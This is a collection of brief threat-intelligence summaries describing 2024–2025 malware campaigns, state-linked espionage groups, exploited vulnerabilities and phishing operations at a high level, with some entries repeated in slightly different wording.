Since October 2024, threat actors have been leveraging Node.js to deliver malware and payloads for information theft and data exfiltration. A recent malvertising campaign uses cryptocurrency trading themes to lure users into downloading malicious installers. The attack chain includes initial access, persistence, defense evasion, data collection, and payload delivery. The malware gathers system information, sets up scheduled tasks, and uses PowerShell for various malicious activities. Another emerging technique involves inline JavaScript execution through Node.js. Recommendations include educating users, monitoring Node.js execution, enforcing PowerShell logging, and implementing endpoint protection.

Cybercriminals are employing deceptive websites on newly registered domains to distribute AndroidOS SpyNote malware. These sites imitate the Google Chrome install page on the Google Play Store, tricking users into downloading SpyNote, a powerful Android remote access trojan. SpyNote is used for surveillance, data exfiltration, and remote control of infected devices. The investigation uncovered multiple domains, IP addresses, and APK files associated with this campaign. The malware utilizes various C2 endpoints for communication and data exfiltration, with functions designed to retrieve and manipulate device information, contacts, SMS, and applications.

The HelloKitty ransomware group, active since late 2020, has resurfaced with new variants in 2024 and potentially 2025. Originally forking from DeathRansom, HelloKitty targets Windows and Linux environments, appending .CRYPTED, .CRYPT, or .KITTY extensions to encrypted files. The group has used multiple TOR domains for negotiations and has been linked to high-profile attacks, including CD Projekt Red. Analysis reveals potential connections to China, despite earlier attributions to Ukraine. The ransomware employs sophisticated encryption techniques, including RSA-2048 and AES. Recent samples show evolving tactics, with increased focus on system discovery and process termination. HelloKitty has also been utilized by other threat actors, including Vice Society and Lapsus$. The group's continued activity and adaptations suggest ongoing relevance in the ransomware landscape.

A sophisticated phishing campaign targeting European diplomatic entities has been uncovered, attributed to the Russia-linked threat group APT29. The attackers impersonate a major European foreign affairs ministry, sending fake invitations to wine tasting events. The campaign employs a new loader called GRAPELOADER, which is used for initial reconnaissance and payload delivery. Additionally, a new variant of the WINELOADER backdoor has been discovered, likely used in later stages of the attack. Both malware components share similarities in code structure and obfuscation techniques. The campaign focuses on European diplomatic targets, including non-European embassies in Europe, with some indications of limited targeting outside the region.

A critical vulnerability (CVE-2025-30406) in Gladinet CentreStack and Triofox software has been discovered and is being actively exploited. The flaw involves hardcoded cryptographic keys in configuration files, allowing attackers to abuse ASPX ViewState for remote code execution. Affected versions include CentreStack below 16.4.10315.56368 and Triofox below 16.4.10317.56372. Exploitation leads to immediate compromise with potential for privilege escalation. Mitigation involves patching or changing machineKey values. Post-exploitation activities include downloading malicious DLLs, lateral movement, and installation of remote access tools like MeshCentral. Immediate action is recommended for vulnerable servers exposed to the internet.

Slow Pisces, a North Korean state-sponsored threat group, is targeting cryptocurrency developers through LinkedIn with malicious coding challenges. The group impersonates recruiters and sends malware disguised as project tasks, infecting systems with RN Loader and RN Stealer. Their campaign uses GitHub repositories containing adapted open-source projects in Python and JavaScript. The malware employs YAML deserialization and EJS rendering to execute arbitrary code from command-and-control servers. Slow Pisces has reportedly stolen over $1 billion from the cryptocurrency sector in 2023, using various methods including fake trading applications and supply chain compromises. The group's operational security is noteworthy, with payloads existing only in memory and deployed selectively.

A malicious npm package named pdf-to-office was discovered targeting cryptocurrency wallets. The package, posing as a PDF to Office converter, injects malicious code into locally installed Atomic and Exodus wallets. This attack modifies legitimate files to redirect crypto funds to the attacker's wallet. The campaign shows persistence, as removing the malicious package doesn't remove the injected code from the wallets. Multiple versions of both wallets were targeted, with the attackers adapting their code accordingly. This incident highlights the growing scope of software supply chain risks, particularly in the cryptocurrency industry, and emphasizes the need for improved monitoring of both source code repositories and locally deployed applications.

Slow Pisces, a North Korean state-sponsored threat group, has launched a campaign targeting cryptocurrency developers using LinkedIn recruitment schemes and malicious coding challenges. The group impersonates recruiters, sending benign PDFs with job descriptions followed by coding tasks linked to compromised GitHub repositories. These repositories contain malware disguised as legitimate projects, using techniques like YAML deserialization and EJS rendering to execute malicious code. The campaign introduces new malware named RN Loader and RN Stealer, which gather victim information and potentially establish persistent access. This sophisticated approach has reportedly led to over $1 billion in cryptocurrency theft in 2023 alone.

A phishing campaign targeting organizations in the hospitality industry has been identified, impersonating Booking.com and using the ClickFix social engineering technique to deliver multiple credential-stealing malware. The campaign, tracked as Storm-1865, targets individuals likely to work with Booking.com in North America, Oceania, Asia, and Europe. The attack uses fake emails and webpages to trick users into executing malicious commands, leading to the download of various malware families including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. The campaign aims to steal financial data and credentials for fraudulent use, showing an evolution in the threat actor's tactics to bypass conventional security measures.

Strela Stealer, an infostealer targeting email clients in specific European countries, has been active since late 2022. It focuses on exfiltrating credentials from Mozilla Thunderbird and Microsoft Outlook. The malware is delivered through phishing campaigns, primarily targeting Spain, Italy, Germany, and Ukraine. Recent attacks involve forwarding legitimate emails with malicious attachments. Strela Stealer employs multi-layer obfuscation and code-flow flattening to complicate analysis. The malware verifies the system's locale before executing, targeting specific German-speaking countries. It searches for email client profile data, encrypts it, and exfiltrates it to a command-and-control server. The infrastructure is linked to Russian bulletproof hosting providers, suggesting potential ties to Russian threat actors.

A stealthy malware campaign dubbed OBSCURE#BAT has been discovered, utilizing social engineering and deceptive file downloads to trick users into executing obfuscated code. The infection chain deploys a user-mode rootkit that manipulates system processes and registry entries to evade detection and maintain persistence. The malware, identified as r77 rootkit, hides files, processes, and registry keys with a specific prefix. It uses highly obfuscated batch scripts, PowerShell commands, and registry manipulation to establish persistence. The campaign targets English-speaking individuals through fake captchas, malvertising, and masquerading as legitimate software. The rootkit's ability to cloak malicious activities and inject into critical system processes makes it particularly dangerous and difficult to detect using conventional methods.

A new Android spyware called KoSpy has been attributed to the North Korean group APT37 (ScarCruft). The malware, active since March 2022, targets Korean and English-speaking users by masquerading as utility apps. KoSpy uses a two-stage C2 infrastructure, retrieving initial configurations from Firebase cloud databases. It can collect extensive data, including SMS messages, call logs, location, files, audio, and screenshots via dynamically loaded plugins. The spyware has been distributed through Google Play and third-party app stores. Evidence suggests infrastructure sharing with APT43 (Kimsuky), another North Korean state-sponsored group. KoSpy's capabilities include collecting sensitive information, recording audio, capturing screenshots, and keylogging. The campaign targets Korean and English speakers, with samples available on Google Play and third-party stores.

A new malware called DocSwap, disguised as a document viewing authentication app, was discovered targeting South Korean mobile users. The malware, linked to a North Korean APT group, performs keylogging and information theft through accessibility services. It decrypts an obfuscated APK file, executes code from a DEX file, and communicates with a C2 server to receive malicious commands. The malware requests extensive permissions, maintains persistence, and performs various malicious activities including camera manipulation and audio recording. The C2 infrastructure initially displayed a phishing page impersonating CoinSwap, later showing characteristics associated with the Kimsuky group. The threat actor has been designated as puNK-004 by S2W TALON.

Mandiant discovered China-nexus espionage group UNC3886 deploying custom backdoors on Juniper Networks' Junos OS routers in mid-2024. The actor used TINYSHELL-based backdoors with various capabilities, including active and passive functions and log disabling. UNC3886 demonstrated advanced system knowledge, bypassing Junos OS security measures and injecting malicious code into legitimate processes. The group focused on maintaining long-term network access, targeting defense, technology, and telecommunication organizations in the US and Asia. This activity highlights the ongoing threat of China-nexus actors compromising networking infrastructure with sophisticated malware ecosystems.

An investigation into a brute force attack on an exposed Remote Desktop server led to the discovery of a larger ransomware ecosystem, particularly initial access brokers. The attack began with domain enumeration and successful compromise of an account from multiple IP addresses. The threat actor's unusual behavior of searching for credentials in files prompted further investigation. Analysis of the IP addresses revealed connections to Hive ransomware and BlackSuit. Pivoting from TLS certificates uncovered a network of geographically distributed infrastructure with a pattern of domain names. The case highlights the importance of thorough analysis in incident response and provides insights into the operations and motivations of ransomware actors.

A highly evasive web campaign is exploiting clipboard hijacking to trick users into running MSI files containing Legion Loader malware. The campaign employs multiple cloaking strategies, including captcha pages, disguised blog sites, and dynamic download URLs. The malicious script instructs victims to paste content into a Run window, which downloads and displays the MSI file. The campaign uses TDS traffic or affiliate links with short-lived parameters to lead victims to malicious download pages. When accessed without valid parameters, the URLs display benign content. The campaign's infrastructure includes 76 domains resolving to a single IP address, all disguised as blog sites.

A widespread financial theft SMS phishing campaign targeting toll road users across multiple U.S. states has been observed since October 2024. The attacks impersonate automatic payment services like E-ZPass, claiming outstanding bills under $5 USD and warning of late fees. Victims are directed to spoofed domains where they are prompted to enter personal and credit card information. The campaign is believed to be carried out by multiple financially motivated threat actors using a smishing kit developed by 'Wang Duo Yu'. The kit's developer offers tutorials and services through Telegram channels and a YouTube channel. The ongoing campaign has targeted at least eight states, including Washington, Florida, Pennsylvania, and Texas, using typosquatted domains resolving to specific IP addresses.

Russian-linked cyber-espionage group Shuckworm appears to be targeting a Western military mission based in Ukraine, according to research by Symantec and its partner, the UK-based security firm.

The Cofense Phishing Defense Center (PDC) has identified a new credential phishing campaign that uses an Amazon e-gift card to harvest Microsoft login credentials from unsuspecting recipients in 2025.

The CNC group, with South Asian origins, has been targeting domestic teachers, students, and research institutions. Their operation, named 'sea elephant', aims to spy on scientific research achievements in the ocean field. The group employs various tactics, including spear-phishing emails, IM software exploitation, and customized plug-ins. Their malware includes remote command execution backdoors, USB flash drive propagation tools, keyloggers, and file stealers. The attackers use GitHub APIs and steganographic techniques to avoid detection. The operation's focus on ocean-related research suggests a nation's determination to dominate the Indian Ocean region. Additionally, a related campaign, UTG-Q-011, targets areas such as laser science and aerospace.

Check Point Research uncovered ongoing campaigns by Blind Eagle (APT-C-36) targeting Colombian institutions since November 2024. The group utilized malicious .url files, similar to CVE-2024-43451, to deliver HeartCrypt-packed malware and Remcos RAT. Campaigns infected over 1,600 victims in a single instance. Blind Eagle exploited legitimate platforms like Google Drive and GitHub for distribution. The group's rapid adaptation to new vulnerabilities and use of underground tools highlight its sophistication. Operating in UTC-5 timezone suggests South American origin. An operational failure revealed past phishing activities targeting Colombian banks, compromising over 8,000 entries of personal data.

The report analyzes phishing email trends in March 2025, revealing that phishing attacks constituted 59% of email threats. Attackers primarily used HTML scripts to mimic login pages and promotional content, aiming to steal user credentials. The analysis covers distribution statistics, Korean phishing email patterns, and case studies of different attachment formats. Document attachments were found to contain hidden malicious files exploiting vulnerabilities, while compressed script files saw an increase in distribution. The report provides insights into attachment file extensions, recent distribution trends, and detailed analyses of specific phishing email attacks to help users identify and mitigate these threats.

An Arabic-speaking threat actor has been distributing ViperSoftX malware to Korean victims since April 1, 2025. The malware, typically spread through cracked software or torrents, operates as a PowerShell script and communicates with C&C servers. The campaign involves downloading additional malware, including a VBS downloader, malicious PowerShell script, PureCrypter, and Quasar RAT. The attackers use Arabic comments in their code and employ various techniques to evade detection, such as adding Windows Defender exception paths. The PowerShell downloader ensures administrator privileges and bypasses security software. PureCrypter, a commercial .NET packer, is used as a downloader, while Quasar RAT provides remote access capabilities. Users are advised to avoid downloading software from torrent sites and to keep their antivirus solutions updated to prevent infection.

This intelligence report analyzes Advanced Persistent Threat (APT) attacks in South Korea during March 2025. The majority of attacks were classified as spear phishing, with LNK file distribution being the most prevalent method. Two types of LNK-based attacks were identified: Type A, which uses a CAB file with malicious scripts, and Type B, which downloads a CAB file containing a malicious Python script. Both types employ obfuscation techniques and execute multiple stages to perform various malicious activities, including information leakage and additional malware downloads. The attacks often use decoy files to appear legitimate and target specific individuals or groups with carefully crafted emails.

Since October 2024, a widespread financial theft SMS phishing campaign has been targeting toll road users across multiple U.S. states. The attackers impersonate automatic payment services like E-ZPass, sending SMS notifications for small outstanding bills under $5 USD. Victims are directed to spoofed domains where they're prompted to enter personal and credit card information. The campaign is believed to be carried out by multiple financially motivated threat actors using a smishing kit developed by 'Wang Duo Yu'. The actors have targeted at least eight states, including Washington, Florida, Pennsylvania, and others. The phishing infrastructure involves typosquatted domains resolving to specific IP addresses. The smishing kits are being sold on Telegram channels, with the developer offering various services and tutorials related to web development and server setup.

Threat actors are employing new techniques to target the cryptocurrency community by uploading packages to popular open source repositories that apply malicious 'patches' to local versions of legitimate libraries. A recent campaign launched on April 1 published a package called 'pdf-to-office' on npm, which injected malicious code into locally installed Atomic Wallet and Exodus crypto wallet software. This attack overwrote existing files, allowing attackers to swap out intended wallet destination addresses with their own. The malicious package was designed to target specific versions of the wallets and included persistence mechanisms. This campaign is part of a larger trend of sophisticated software supply chain attacks targeting the cryptocurrency industry, highlighting the need for improved monitoring and security measures in both commercial and open-source software.

The Chinese eCrime group Smishing Triad has launched a global SMS phishing campaign targeting over 121 countries across various industries. Their infrastructure generates over one million page visits in 20 days, averaging 50,000 daily. The group has introduced a new 'Lighthouse' phishing kit focusing on banking and financial organizations, particularly in Australia and the Asia-Pacific region. Smishing Triad claims to have '300+ front desk staff worldwide' supporting their operations. They frequently rotate domains, with approximately 25,000 active during any 8-day period. The majority of phishing sites are hosted by Chinese companies Tencent and Alibaba. The campaign primarily targets postal, logistics, telecommunications, transportation, finance, retail, and public sectors.

Deceptive websites hosted on newly registered domains are being used to deliver AndroidOS SpyNote malware, mimicking the Google Chrome install page on the Google Play Store. The campaign utilizes a mix of English and Chinese-language delivery sites, with Chinese-language comments in the code. The malware is distributed through a two-stage installation process, using an APK dropper to deploy the core SpyNote RAT. SpyNote is a potent Android remote access trojan capable of extensive surveillance, data exfiltration, and remote control. It aggressively requests numerous intrusive permissions, allowing for theft of sensitive data and significant remote access capabilities. The malware's keylogging functionality and ability to manipulate calls, activate cameras and microphones, and remotely wipe data make it a formidable tool for espionage and cybercrime.

A new variant of the fake NextGen mParivahan malware has emerged, exhibiting enhanced stealth and data theft capabilities. The malware, disguised as a government traffic notification system, tricks users into downloading a malicious app that requests extensive permissions. This latest version targets messages from social media, communication, and e-commerce apps, posing a greater threat to user privacy. It employs advanced techniques such as malformed APKs, multi-stage dropper-payload architectures, and dynamic C2 generation to evade detection. The malware steals sensitive data, including SMS messages and notification content, uploading it to Firebase or a C2 server. Its ability to access notifications, SMS, and app data significantly risks user privacy, highlighting the need for improved security awareness and analysis tools.

A zero-day elevation of privilege vulnerability in Windows Common Log File System (CLFS) has been exploited against targets in IT, real estate, finance, software, and retail sectors across multiple countries. The exploit, deployed by PipeMagic malware and attributed to Storm-2460, enables privilege escalation and ransomware deployment. The vulnerability, CVE-2025-29824, was patched on April 8, 2025. The attack involves downloading malicious MSBuild files, using PipeMagic, and exploiting CLFS to inject payloads into system processes. Post-exploitation activities include credential theft and ransomware deployment, with similarities to RansomEXX. Microsoft recommends immediate patching and provides mitigation strategies, detection methods, and hunting queries to counter this threat.

The Sapphire Werewolf cluster has upgraded its toolkit with a new version of the Amethyst stealer, targeting energy companies through phishing emails. The enhanced malware features advanced checks for virtualized environments and uses Triple DES for string encryption. The attack involves distributing a malicious attachment disguised as an official memo, which contains a C#-based loader protected with .NET Reactor. The Amethyst stealer collects extensive system data, credentials from various applications, and documents from compromised systems. The threat actor's sophisticated approach includes improved evasion techniques and data exfiltration methods, posing a significant risk to targeted organizations.

Neptune RAT, a sophisticated Windows-based remote access trojan, has emerged with advanced capabilities including system destruction and password exfiltration from over 270 applications. It employs PowerShell commands for deployment, leveraging catbox.moe for hosting malicious scripts. The malware incorporates anti-analysis techniques, persistence methods, and dangerous features such as ransomware, crypto clipping, and live desktop monitoring. It uses obfuscation, including Arabic characters, to evade detection. The RAT's modular structure allows for various malicious activities, including clipboard manipulation, email credential theft, and Master Boot Record corruption. Its distribution through platforms like GitHub and its evolving nature pose significant risks to both individuals and organizations.

Scattered Spider, a notorious hacking collective, continues to actively target victims in 2025. The group has expanded its focus to include services like Klaviyo, HubSpot, and Pure Storage, while targeting high-profile brands such as Audemars Piguet, Chick-fil-A, and Twitter/X. Silent Push researchers have identified five unique phishing kits used by Scattered Spider since 2023, with some undergoing updates. A new version of Spectre RAT has been discovered, along with the acquisition of a domain previously owned by Twitter/X. Despite arrests of several members in 2024, Scattered Spider has adapted its tactics, including the use of dynamic DNS providers and updated phishing kits. The group continues to employ sophisticated social engineering attacks to obtain credentials and multi-factor authentication tokens.

A zero-day elevation of privilege vulnerability in the Windows Common Log File System (CLFS) has been exploited against targets in various sectors across multiple countries. The exploit, deployed by PipeMagic malware and attributed to Storm-2460, enables privilege escalation and ransomware deployment. Post-exploitation activities include credential theft and file encryption. The vulnerability, tracked as CVE-2025-29824, has been patched. Mitigation strategies include applying security updates, enabling cloud-delivered protection, and implementing advanced security measures. Multiple detection methods and hunting queries are provided for identifying and responding to this threat.

A sophisticated cyber-attack has been identified by the Cofense Phishing Defense Center, combining phishing techniques targeting Office365 credentials with malware delivery. The campaign uses a file deletion reminder as bait, exploiting a legitimate file-sharing service to increase credibility. Users are led to a fake Microsoft login page or prompted to download malware disguised as a OneDrive installer. The attack employs ConnectWise RAT, a legitimate remote administration tool exploited for malicious purposes. The malware establishes persistence through system services and registry modifications, highlighting the need for enhanced user awareness and education to combat such dual-threat approaches.

Pakistan-linked SideCopy APT has expanded its targeting to include Indian railways, oil & gas, and external affairs ministries. The group has shifted from HTA files to MSI packages for staging, employing advanced techniques like DLL side-loading and reflective loading. They are leveraging customized open-source tools such as Xeno RAT and Spark RAT, and deploying a new CurlBack RAT. The attackers use compromised domains and fake sites for credential phishing and payload hosting. New tactics include reflective loading, AES decryption via PowerShell, and multi-platform attacks targeting both Windows and Linux systems. The group continues to evolve its methods to enhance persistence and evade detection.

A unique malware distribution scheme exploiting SourceForge has been discovered. The attackers create a seemingly legitimate project on sourceforge.net, which automatically generates a sourceforge.io subdomain. This subdomain is then used to host a malicious page that tricks users into downloading a compressed archive containing malware. The infection chain involves multiple stages, including the use of password-protected archives, Visual Basic scripts, and PowerShell commands. The main payloads are a cryptocurrency miner and ClipBanker, a Trojan that replaces cryptocurrency wallet addresses in the clipboard. The campaign primarily targets Russian-speaking users, with 90% of potential victims located in Russia.

A sophisticated cryptomining campaign has been discovered targeting developers through seemingly legitimate VS Code extensions. The campaign, potentially reaching over one million installations, involves fake extensions published by three different authors. These extensions secretly download a PowerShell script that disables Windows security, establishes persistence, and installs an XMRig cryptominer. The most successful fake extension gained 189K installs. The attackers created a multi-stage attack, even installing legitimate extensions they impersonated to avoid suspicion. The campaign published ten different malicious extensions, with the top three showing unusually high install counts, suggesting artificial inflation. The extensions share identical code and communicate with the same C2 server. The PowerShell script sets up persistence mechanisms, disables Windows security services, and attempts privilege escalation.

Cybercriminals are reviving the Grandoreiro banking trojan, targeting users in Latin America and Europe through large-scale phishing campaigns. The malware is distributed via emails impersonating tax agencies, leading victims to download malicious payloads from Contabo-hosted servers and Mediafire. The attack chain involves obfuscated VBS scripts and a Delphi-based EXE that steals credentials and connects to a C2 server. The campaign employs dynamic URLs, social engineering, and various obfuscation techniques to evade detection. Users in Mexico, Argentina, and Spain are primary targets, with the malware searching for Bitcoin wallet directories and system information. Frequent changes to subdomains under contaboserver[.]net are used to avoid detection.

North Korean threat actors have expanded their presence in the npm ecosystem, publishing additional malicious packages that deliver the BeaverTail malware and introduce new remote access trojan loader functionality. The campaign, known as Contagious Interview, aims to compromise developer systems, steal sensitive data, and maintain access to compromised environments. The actors have created new npm accounts and deployed malicious code across npm, GitHub, and Bitbucket. The expanded campaign includes 11 new packages with over 5,600 downloads, using hexadecimal string encoding to evade detection. The malware targets browser data, macOS keychain, and cryptocurrency wallets. The threat actors are diversifying their tactics, using multiple malware variants and obfuscation techniques to ensure resilience and evade detection.

A ransomware attack on Mackay Memorial Hospital in Taiwan highlights the growing use of publicly available offensive tools by threat actors. The CrazyHunter ransomware, built using the Prince Ransomware builder from GitHub, encrypted over 600 devices across two hospital branches. The attack, likely initiated via a USB device, employed various tools for defense evasion, encryption, and lateral movement. The threat actor used a vulnerable Zemana driver to disable security products, utilized the Prince Ransomware builder for file encryption, and leveraged SharpGPOAbuse for lateral movement. The incident demonstrates the increasing accessibility of cyber attack tools, enabling even less skilled actors to launch sophisticated attacks. This trend poses significant challenges for attribution and defense against ransomware threats.

The Wagmi traffer group, operating since early 2023, specializes in NFT scams and cryptocurrency theft. They utilize sophisticated social engineering tactics, fake web3-themed games, and impersonation of legitimate projects to lure victims. Their operations have allegedly earned over $2.4 million between June 2023 and March 2025. The group employs various techniques, including seed phrase phishing and automated wallet address scraping from social media. They target users of NFT marketplaces and the Web3 community, using fake job offers and enticing game promotions. The group also engages in code signing certificate abuse to bypass security measures and increase infection rates. Their malware payloads include HijackLoader, Lumma C2 infostealer, Rhadamanthys stealer, and AMOS stealer for MacOS.

This analysis covers cyber threats and security issues in the financial industry, focusing on South Korea and global incidents. It examines malware and phishing cases, lists top malware strains, and provides statistics on leaked Korean accounts. The report delves into major financial threats on the dark web, including credit card data breaches, database leaks, and ransomware attacks. Notable cases involve the sale of 40 GB of credit card details from BidenCash, a data breach at a Swiss insurance company, a ransomware attack on a Sri Lankan bank, and the sale of SSH access credentials for a Canadian bankers association. These incidents highlight the need for enhanced security measures, comprehensive data management, and vigilance against evolving cyber threats in the financial sector.

A new threat group, dubbed PoisonSeed, is targeting enterprise organizations and individuals outside the cryptocurrency industry. The campaign focuses on phishing CRM and bulk email providers' credentials to export email lists and send bulk spam. The attackers use a cryptocurrency seed phrase poisoning attack, providing security seed phrases to trick victims into compromising their wallets. Similarities have been detected between PoisonSeed, Scattered Spider, and CryptoChameleon, but the campaign is being classified separately due to unique characteristics. The attackers have set up phishing pages for prominent CRM and bulk email companies, including Mailchimp, SendGrid, Hubspot, Mailgun, and Zoho. Once credentials are phished, the process of bulk downloading email lists appears to be automated. The campaign also involves spam sent from compromised accounts, including a notable breach of an Akamai SendGrid account.

A recent analysis uncovered a sophisticated deployment of Vidar Stealer, an infamous information-stealing malware, disguised as a legitimate Microsoft Sysinternals tool, BGInfo.exe. The malware, found with an expired Microsoft signature, was significantly larger than the original file and contained modified initialization routines. It creates virtual memory allocations to execute its malicious code, ultimately extracting and running Vidar Stealer. This variant maintains its core functionalities, including credential theft, cryptocurrency wallet targeting, session hijacking, and cloud data theft. The incident highlights the evolving tactics of cybercriminals, emphasizing the need for vigilant threat hunting and proactive security measures.

The ToddyCat APT group has developed a sophisticated tool called TCESB to stealthily execute payloads and evade detection. This tool exploits a vulnerability (CVE-2024-11859) in ESET Command line scanner for DLL proxying, using a modified version of the open-source EDRSandBlast malware. TCESB employs techniques like DLL proxying, kernel memory manipulation, and Bring Your Own Vulnerable Driver (BYOVD) to bypass security solutions. It searches for kernel structure addresses using CSV or PDB files, installs a vulnerable Dell driver, and decrypts AES-128 encrypted payloads. The discovery highlights the need for monitoring driver installations and Windows kernel debug symbol loading events to detect such sophisticated attacks.

EncryptHub, an emerging cybercriminal entity, has been conducting multi-stage malware campaigns using trojanized applications and third-party distribution services. Their tactics include using PowerShell scripts for system data gathering, information exfiltration, and payload deployment. The threat actor prioritizes stolen credentials based on cryptocurrency ownership and corporate network affiliation. EncryptHub is developing a remote access tool called 'EncryptRAT' with plans for future distribution. Their evolving killchain involves multiple stages, including initial execution, data exfiltration, system information collection, and eventual deployment of the Rhadamanthys malware. Despite operational security mistakes, EncryptHub continues to refine their tactics, emphasizing the need for vigilant cybersecurity measures.

A critical vulnerability (CVE-2025-31161) in CrushFTP managed file transfer software allows attackers to bypass authentication and gain admin-level access. Affecting versions 10.0.0-10.8.3 and 11.0.0-11.3.0, the flaw enables unauthorized actions, including data retrieval and administrative control. Exploitation has been observed since March 30, 2025, with ~1,500 vulnerable instances exposed. Post-exploitation activities include creating backdoor accounts, deploying MeshCentral agents, and using AnyDesk for remote access. A Telegram bot-based malware was also identified. The vulnerability stems from improper S3 authorization header processing and can be exploited with a simple HTTP request. Immediate patching to versions 11.3.1+ or 10.8.4+ is strongly recommended.

A new malicious campaign has been discovered targeting users searching for PDF documents online. The attack uses fake CAPTCHAs and CloudFlare Turnstile to deliver LegionLoader malware, which then installs a malicious browser extension. The infection chain involves a drive-by download, execution of a VMware-signed application that sideloads a malicious DLL, and use of process hollowing to inject the LegionLoader payload. The browser extension, disguised as 'Save to Google Drive', is installed on Chrome, Edge, Brave and Opera browsers to steal sensitive user data and monitor Bitcoin activities. The campaign has affected over 140 customers, primarily in North America, Asia and Southern Europe, with technology and financial services sectors being the most targeted.

A new campaign utilizing the Brazilian stealer Grandoreiro has been detected targeting Spain and Latin American countries. The malware, active since 2017, aims to steal sensitive information, including banking credentials and personal data. It employs advanced evasion techniques such as string encryption and anti-sandbox measures. The campaign distributes Grandoreiro through phishing emails containing VBS files. Once executed, it performs various checks to evade detection and uses legitimate services for geolocation and DNS resolution. The report provides detailed insights into the malware's behavior and explains the string obfuscation and decryption techniques used in this campaign.

This analysis focuses on Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It examines the activities of a threat actor known as 'Coquettte,' who is linked to the Horrid hacking group. The investigation reveals a fake cybersecurity website used for malware distribution, and explores Coquettte's broader criminal ventures, including a website allegedly providing guides for illegal activities. The research highlights Proton66's role as a breeding ground for amateur threat actors and provides insights into the malware infrastructure used by Coquettte, including the Rugmi/Penguish loader trojan. The analysis also uncovers connections to other domains and potential affiliations with a larger hacking collective.

The Lotus Blossom espionage group has been conducting cyber espionage campaigns targeting government, manufacturing, telecommunications, and media sectors in the Philippines, Vietnam, Hong Kong, and Taiwan. The group employs various versions of the Sagerunex backdoor, including new variants that use cloud services like Dropbox, Twitter, and Zimbra for command and control. Lotus Blossom utilizes multiple hacking tools and techniques to maintain long-term persistence in compromised networks. The attacks involve multi-stage operations, including reconnaissance, lateral movement, and data exfiltration. The group has been active since at least 2012 and continues to evolve its tactics and malware to evade detection.

The Kimsuky APT group, also known as Black Banshee, has been actively targeting South Korean government entities using evolving tactics. Two distinct campaigns were uncovered, both utilizing government-themed PDF documents as lures. The infection chain begins with a phishing email containing a malicious LNK file attachment, which drops an obfuscated VBA script. This script then deploys additional files, including a PDF and a ZIP containing malicious components. The attacks involve sophisticated techniques such as Base64 encoding, obfuscation, and VM-aware evasion. The malware's functionalities include data exfiltration, cryptocurrency wallet theft, browser data extraction, keylogging, and establishing C2 communication. The campaigns demonstrate the group's continuous efforts to compromise South Korean targets using deceptive tactics and multi-stage malware.

This analysis delves into Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It focuses on a threat actor known as 'Coquettte' and their ties to the Horrid hacking group, a loosely organized cybercriminal collective. The investigation reveals a fake cybersecurity website, cybersecureprotect[.]com, which exposed its malicious infrastructure due to an OPSEC failure. Coquettte's activities include distributing malware, keyloggers, and trojans through Proton66's infrastructure. The research also uncovers other projects operated by this actor, including a website hosting guides for illegal activities. The analysis provides technical details of Coquettte's malware infrastructure and explores Proton66's role as a breeding ground for amateur threat actors.

A Russian-speaking threat actor has launched a new phishing campaign using Cloudflare-branded pages themed around DMCA takedown notices. The attack abuses the ms-search protocol to deliver malicious LNK files disguised as PDFs. Once executed, the malware communicates with a Telegram bot to report the victim's IP address before connecting to Pyramid C2 servers. The campaign leverages Cloudflare Pages and Workers services to host phishing pages, and uses an open directory to store malicious files. The infection chain includes PowerShell and Python scripts, with incremental changes in tactics to evade detection. The actors' infrastructure spans multiple domains and IP addresses, primarily using Cloudflare's network.

A sophisticated credit card skimming campaign dubbed 'RolandSkimmer' has been discovered, targeting users in Bulgaria. The attack utilizes malicious browser extensions across Chrome, Edge, and Firefox, initiated through a deceptive LNK file. The malware employs obfuscated scripts to establish persistent access, harvesting and exfiltrating sensitive financial data. The attack workflow involves system reconnaissance, downloading additional malicious files, and injecting scripts into web pages. The threat actor uses unique identifiers to track victims and employs sophisticated techniques to evade detection. The campaign demonstrates the evolving nature of web-based credit card skimming threats, highlighting the need for enhanced security measures against LNK-based attacks and unverified browser extensions.

A malicious campaign is targeting the Go ecosystem with typosquatted packages that install hidden loader malware on Linux and macOS systems. The threat actor has published at least seven packages impersonating popular Go libraries, using array-based string obfuscation to hide malicious commands. The packages download and execute remote scripts that install an ELF file named f0eee999, which exhibits minimal initial malicious behavior. The campaign specifically targets UNIX-like environments, placing developers at risk. Multiple domains and fallback infrastructure suggest a persistent and adaptable threat actor. Developers are advised to implement real-time scanning tools, code audits, and careful dependency management to mitigate the risk of supply chain compromises.

This analysis delves into APT28's cyber espionage campaign targeting Central Asia and Kazakhstan diplomatic relations, focusing on their HTA Trojan. The malware employs advanced obfuscation techniques, including VBE (VBScript Encoded) and multi-layer obfuscation. The investigation uses x32dbg debugging to decode the obfuscated code, revealing a custom map algorithm for character deobfuscation. The process involves decoding strings using embedded characters from Windows vbscript.dll. The analysis identifies the use of Microsoft's Windows Script Encoder (screnc.exe) to create VBE files. By employing various deobfuscation techniques, including a Python script, the final malware sample is extracted and analyzed, showcasing APT28's evolving tactics in cyber espionage.

A critical security vulnerability, CVE-2025-22457, affecting Ivanti Connect Secure VPN appliances has been actively exploited since mid-March 2025. The vulnerability allows remote code execution through a buffer overflow. Two new malware families, TRAILBLAZE and BRUSHFIRE, have been deployed along with the previously known SPAWN ecosystem. The suspected China-nexus espionage actor UNC5221 is believed to be behind the attacks. Post-exploitation activities include the use of a shell script dropper, deployment of various malware components, and attempts to evade detection by modifying the Integrity Checker Tool. Organizations are urged to immediately patch their systems and monitor for suspicious activity.

ClickFix is a browser-based delivery technique that uses deceptive prompts and clipboard hijacking to trick users into executing malicious commands. Cybercriminals and advanced actors employ this method to deploy malware, primarily information stealers. The technique involves luring users with fake system alerts or CAPTCHA challenges, then silently staging payloads for execution. The article describes how Hunt.io's research team used custom queries to identify web infrastructure associated with ClickFix delivery, uncovering multiple live domains serving malicious content. Examples include a Bitcoin-themed domain posing as Cloudflare WAF to deliver Lumma and CryptBot malware, a page targeting Zoho Office Suite credentials, and a compromised website abusing PowerShell. The report emphasizes the growing traction of ClickFix as a low-friction method for malware delivery and credential harvesting.

